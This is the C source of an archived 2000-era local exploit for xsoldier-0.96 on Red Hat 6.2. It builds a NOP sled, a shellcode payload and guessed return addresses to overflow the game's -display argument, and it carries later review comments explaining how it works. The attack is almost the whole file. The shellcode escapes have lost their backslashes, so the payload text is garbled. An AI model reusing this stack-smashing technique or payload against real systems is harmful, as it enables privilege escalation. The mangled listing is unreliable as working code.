# Title : Linux xsoldier-0.96 exploit (Red Hat 6.2)
# Published : 2000-12-15
# Author : zorgon
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90
#define BUFSIZE 4408
#define OFFSET 0
#define RANGE 20
/*
 * Payload bytes that main() places in the middle of the oversized argument.
 *
 * NOTE(review): every escape here reads "xNN" rather than "\xNN". The
 * backslashes appear to have been stripped when this page was extracted
 * (the same happened to the "\n" in the fprintf() format strings below), so
 * as written this is a literal of ordinary ASCII text, not the byte sequence
 * the author intended, and strlen(blah) in main() measures that text. Kept
 * as-is: this is an archived record of a 2000-era Red Hat 6.2 local
 * exploit, not a working listing.
 */
unsigned char blah[] =
"xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x6cx80x36x01x46xe2xfa"
"xeax09x2ex63x68x6fx2ex72x69x01x80xedx66x2ax01x01"
"x54x88xe4x82xedx1dx56x57x52xe9x01x01x01x01x5ax80xc2xc7x11"
"x01x01x8cxbax1fxeexfexfexc6x44xfdx01x01x01x01x88x7cxf9xb9"
"x47x01x01x01x30xf7x30xc8x52x88xf2xccx81x8cx4cxf9xb9x0ax01"
"x01x01x88xffx30xd3x52x88xf2xccx81x30xc1x5ax5fx5ex88xedx5c"
"xc2x91";
/*
 * Returns the caller's approximate stack pointer (i386 only): copies %esp
 * into %eax and relies on %eax being the integer return register.
 *
 * There is no return statement, so using the value of this call is undefined
 * behaviour in standard C; it only "works" by ABI accident at -O0 on a
 * 32-bit x86 toolchain and may be clobbered or dropped by an optimising
 * compiler. The value is also only meaningful for the address-layout
 * assumptions of the original target (Red Hat 6.2, no ASLR).
 */
long get_sp () { __asm__ ("mov %esp, %eax"); }
/*
 * Builds a BUFSIZE-byte argument and hands it to ./xsoldier as the value of
 * its "-display" option: a run of NOP bytes, then the blah payload, then
 * repeated 4-byte copies of (stack pointer + offset) used as the guessed
 * return address. This is the textbook late-1990s stack smash through an
 * oversized command-line argument; non-executable stacks, ASLR and stack
 * canaries, all default on current distributions, defeat this pattern.
 *
 * argv[1], if present, is the decimal offset added to the return address
 * (parsed with atoi(), so garbage silently becomes 0). On success the
 * process is replaced by execl() and never returns; if execl() fails the
 * function falls off the end without a return statement.
 *
 * Portability / correctness notes (not fixed; archived listing):
 *  - strlen() and memcpy() are used without <string.h> and execl() without
 *    <unistd.h>; only <stdio.h>/<stdlib.h> are included, so these are
 *    implicit declarations (accepted by 2000-era gcc, an error in C99+).
 *  - "%x" is given an unsigned long (ret + offset); the matching specifier
 *    would be "%lx".
 *  - The format strings end in a bare "n": the "\n" escapes appear to have
 *    been stripped when the page was extracted, like the payload above.
 */
int
main (int argc, char *argv[])
{
char buffer[BUFSIZE];
int i, offset;
unsigned long ret;
/* Optional tuning knob for the return-address guess. */
if (argc > 1)
offset = atoi(argv[1]);
else
offset = OFFSET;
/*
 * NOP sled: everything before the payload. The bound mixes int i with the
 * size_t result of strlen(), a signed/unsigned comparison (-Wsign-compare).
 */
for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++)
*(buffer + i) = NOP;
/* Payload immediately after the sled (no NUL is copied). */
memcpy (buffer + i, blah, strlen (blah));
ret = get_sp();
/*
 * Fill the remaining RANGE*2 bytes with the guessed return address, 4 bytes
 * at a time; i starts at BUFSIZE - RANGE*2 (4368), so the last write lands
 * exactly at the end of buffer. Nothing NUL-terminates buffer: execl()
 * reads it as a C string and depends on a zero byte turning up inside the
 * repeated addresses or in whatever follows buffer on the stack.
 */
for (i = i + strlen (blah); i < BUFSIZE; i += 4)
*(long *) &buffer[i] = ret+offset;
fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)n");
fprintf(stderr, "zorgon@antionline.orgn");
fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]n", ret + offset, offset, BUFSIZE);
/*
 * The trailing sentinel is a plain int 0; a variadic function expects a
 * null pointer here ((char *)0 / NULL), which differs from int on LP64.
 */
execl ("./xsoldier", "xsoldier", "-display", buffer, 0);
}